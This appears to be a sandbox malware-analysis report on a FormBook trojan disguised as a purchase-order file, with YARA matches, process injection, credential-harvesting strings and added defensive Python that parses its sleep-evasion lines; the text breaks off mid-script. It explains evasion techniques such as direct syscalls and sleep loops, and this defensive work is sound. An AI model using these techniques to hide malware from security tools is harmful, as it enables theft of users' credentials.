        Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@23/12
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe File created: C:\Users\user\AppData\Local\Temp\syphilous
        Source: Purchase_Order_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: rasdial.exe, 00000005.00000003.2608027017.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2607979855.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2609646066.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4484702585.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2609646066.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4484702585.0000000000B88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Purchase_Order_pdf.exe ReversingLabs: Detection: 41%
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe File read: C:\Users\user\Desktop\Purchase_Order_pdf.exe
        Source: unknown Process created: C:\Users\user\Desktop\Purchase_Order_pdf.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
        Source: C:\Windows\SysWOW64\rasdial.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: wsock32.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: winmm.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Windows\SysWOW64\rasdial.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Purchase_Order_pdf.exe Static file information: File size 1327231 > 1048576
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hEtOKWgxZfeL.exe, 00000004.00000002.4484569448.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4484878886.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp
        Source: Purchase_Order_pdf.exe Static PE information: real checksum: 0xa2135 should be: 0x14e6ee
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe API/Special instruction interceptor: Address: 3F35A84
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88ED324
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88ED944
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88ED504
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88ED544
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88F0154
        Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
        Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 9721
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060 Thread sleep count: 252 > 30
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060 Thread sleep time: -504000s >= -30000s
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060 Thread sleep count: 9721 > 30
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060 Thread sleep time: -19442000s >= -30000s
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576 Thread sleep time: -80000s >= -30000s
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576 Thread sleep time: -43500s >= -30000s
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576 Thread sleep count: 35 > 30
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576 Thread sleep time: -35000s >= -30000s
        Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: VMware
Source: 1FZhY82B.5.dr, binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: firefox.exe, 00000008.00000002.2721144966.00000276920AC000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS!
Source: 1FZhY82B.5.dr, binary or memory string: discord.comVMware20,11696428655f
Source: 1FZhY82B.5.dr, binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: global block list test formVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 1FZhY82B.5.dr, binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: Interactive Brokers - NDCDYNVMware20,116
Source: 1FZhY82B.5.dr, binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 1FZhY82B.5.dr, binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 1FZhY82B.5.dr, binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 1FZhY82B.5.dr, binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: last_fourVARCHARVMware
Source: 1FZhY82B.5.dr, binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: outlook.office.comVMware20,11696428655s
Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: AMC password management pageVMware20,11696428655L
Source: 1FZhY82B.5.dr, binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 1FZhY82B.5.dr, binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: AMC password management pageVMware20,11696428655
Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: ms.portal.azure.comVMware20,116964286
Source: 1FZhY82B.5.dr, binary or memory string: tasks.office.comVMware20,11696428655o
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 1FZhY82B.5.dr, binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 1FZhY82B.5.dr, binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: dev.azure.comVMware20,11696428655j
Source: 1FZhY82B.5.dr, binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 1FZhY82B.5.dr, binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: hEtOKWgxZfeL.exe, 00000007.00000002.4485448205.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: 1FZhY82B.5.dr, binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 1FZhY82B.5.dr, binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 1FZhY82B.5.dr, binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\svchost.exe, process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe, process queried: DebugPort
Source: C:\Windows\SysWOW64\rasdial.exe, process queried: DebugPort
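The sleep observations above are the raw material behind the "May sleep (evasive loops) to hinder dynamic analysis" verdict. The following is an added example, not Joe Sandbox code and not part of the report: it parses the report's own "Thread sleep" lines (embedded below as constructed input, paths shortened to the basename) and applies the two thresholds the lines themselves print (a single delay of 30000 or more, or more than 30 sleep calls). One assumption is stated in the code: the report labels the delays "s", but 9721 calls summing to 19442000 is exactly 2000 per call, which is only plausible in milliseconds, so the values are treated as ms.

```python
"""Flag sandbox-evasion sleeps in Joe Sandbox 'Thread sleep' signature lines.

Added example for this report, not Joe Sandbox code.  The parser tolerates
the fused form the report uses ('TID: 7060Thread sleep time: ...').
"""
import re
from collections import defaultdict

# Joe prints the NtDelayExecution interval as a negative number because the
# Windows API encodes a *relative* delay as a negative LARGE_INTEGER.  The
# report labels the value "s", but 9721 calls adding up to 19442000 is exactly
# 2000 per call, which only makes sense in milliseconds; the code therefore
# treats the values as ms (an inference from the report's numbers).
SLEEP_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>time|count):\s*(?P<val>-?\d+)"
)

SINGLE_SLEEP_MS = 30_000  # the ">= -30000" threshold printed in the report
LOOP_COUNT = 30           # the "> 30" threshold printed in the report

# Constructed input: the report's own sleep lines, process paths shortened.
REPORT_LINES = [
    "Source: C:\\Windows\\SysWOW64\\rasdial.exe TID: 7060Thread sleep time: -504000s >= -30000s",
    "Source: C:\\Windows\\SysWOW64\\rasdial.exe TID: 7060Thread sleep count: 9721 > 30",
    "Source: C:\\Windows\\SysWOW64\\rasdial.exe TID: 7060Thread sleep time: -19442000s >= -30000s",
    "Source: hEtOKWgxZfeL.exe TID: 576Thread sleep time: -80000s >= -30000s",
    "Source: hEtOKWgxZfeL.exe TID: 576Thread sleep time: -43500s >= -30000s",
    "Source: hEtOKWgxZfeL.exe TID: 576Thread sleep count: 35 > 30",
    "Source: hEtOKWgxZfeL.exe TID: 576Thread sleep time: -35000s >= -30000s",
]


def parse_sleep_lines(lines):
    """Group the sleep observations per (process basename, thread id)."""
    threads = defaultdict(lambda: {"times_ms": [], "count": 0})
    for line in lines:
        m = SLEEP_RE.search(line)
        if not m:
            continue
        key = (m["proc"].rsplit("\\", 1)[-1], int(m["tid"]))
        entry = threads[key]
        if m["kind"] == "time":
            entry["times_ms"].append(abs(int(m["val"])))
        else:
            entry["count"] = max(entry["count"], int(m["val"]))
    return threads


def classify(entry):
    """Apply the report's two thresholds and estimate the per-call delay."""
    longest = max(entry["times_ms"], default=0)
    count = entry["count"]
    reasons = []
    if longest >= SINGLE_SLEEP_MS:
        reasons.append(f"delay of {longest} ms >= {SINGLE_SLEEP_MS} ms")
    if count > LOOP_COUNT:
        reasons.append(f"{count} sleep calls > {LOOP_COUNT}")
    # A loop of short sleeps is the pattern that survives sandboxes which only
    # shorten *long* delays.  Dividing the largest reported time by the call
    # count approximates the loop interval; it is exact when the reported time
    # is the loop's cumulative total, as for TID 7060 (19442000 / 9721 = 2000).
    per_call_ms = longest // count if count else None
    return {
        "longest_ms": longest,
        "count": count,
        "per_call_ms": per_call_ms,
        "evasive": bool(reasons),
        "reasons": reasons,
    }


def evasive_threads(lines):
    """Return {(process, tid): verdict} for threads that trip a threshold."""
    return {k: v for k, v in
            ((k, classify(e)) for k, e in parse_sleep_lines(lines).items())
            if v["evasive"]}


if __name__ == "__main__":
    for (proc, tid), v in evasive_threads(REPORT_LINES).items():
        print(f"{proc} TID {tid}: {', '.join(v['reasons'])}; "
              f"~{v['per_call_ms']} ms per call")
```

Two reading notes on the string hits that follow the sleep lines. Nearly every "VMware" hit sits in 1FZhY82B.5.dr, the file process 5 (rasdial.exe) wrote, next to bank and broker host names, password-manager test entries and a SQLite column name (last_fourVARCHAR); that is harvested browser-store content carrying the sandbox user's own strings, not evidence that the sample looked for VMware. The "Hyper-V RAW%SystemRoot%\system32\mswsock.dll" hits are the Winsock protocol catalog entry that mswsock.dll registers on every Windows 10 host, present in any process that initialised Winsock, so they carry no evasion signal either.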

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, direct syscalls (Nt* function: call-site address):
NtAllocateVirtualMemory: Direct from: 0x76EF48EC
NtQueryAttributesFile: Direct from: 0x76EF2E6C
NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
NtQuerySystemInformation: Direct from: 0x76EF48CC
NtOpenSection: Direct from: 0x76EF2E0C
NtDeviceIoControlFile: Direct from: 0x76EF2AEC
NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
NtQueryInformationToken: Direct from: 0x76EF2CAC
NtCreateFile: Direct from: 0x76EF2FEC
NtOpenFile: Direct from: 0x76EF2DCC
NtTerminateThread: Direct from: 0x76EF2FCC
NtOpenKeyEx: Direct from: 0x76EF2B9C
NtSetInformationProcess: Direct from: 0x76EF2C5C
NtProtectVirtualMemory: Direct from: 0x76EF2F9C
NtWriteVirtualMemory: Direct from: 0x76EF2E3C
NtNotifyChangeKey: Direct from: 0x76EF3C2C
NtCreateMutant: Direct from: 0x76EF35CC
NtResumeThread: Direct from: 0x76EF36AC
NtMapViewOfSection: Direct from: 0x76EF2D1C
NtProtectVirtualMemory: Direct from: 0x76EE7B2E
NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
NtQuerySystemInformation: Direct from: 0x76EF2DFC
NtReadFile: Direct from: 0x76EF2ADC
NtDelayExecution: Direct from: 0x76EF2DDC
NtQueryInformationProcess: Direct from: 0x76EF2C26
NtResumeThread: Direct from: 0x76EF2FBC
NtCreateUserProcess: Direct from: 0x76EF371C
NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
NtWriteVirtualMemory: Direct from: 0x76EF490C
NtSetInformationThread: Direct from: 0x76EE63F9
NtClose: Direct from: 0x76EF2B6C
NtSetInformationThread: Direct from: 0x76EF2B4C
NtReadVirtualMemory: Direct from: 0x76EF2E8C
NtCreateKey: Direct from: 0x76EF2C6C
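"Direct from" records the address the syscall instruction executed at. A syscall that runs outside the ntdll.dll image the loader mapped never passes through the exported Nt* stubs, so user-mode hooks on those stubs (EDR, sandbox instrumentation) do not see it; FormBook has long been documented to map its own copy of ntdll.dll and call the functions from that copy, which produces exactly this kind of address. The check below is an added example, not Joe Sandbox code: it parses six of the report's 34 lines (embedded as constructed input, process path shortened), looks each call-site address up in a module map, and groups the addresses into clusters. The module map is hypothetical and not from the report; substitute the loaded-module list of the process under analysis.

```python
"""Classify the call-site addresses behind Joe's 'Direct from:' syscall lines.

Added example, not Joe Sandbox code.  A syscall instruction that executes
outside the ntdll.dll image mapped by the loader never passes through the
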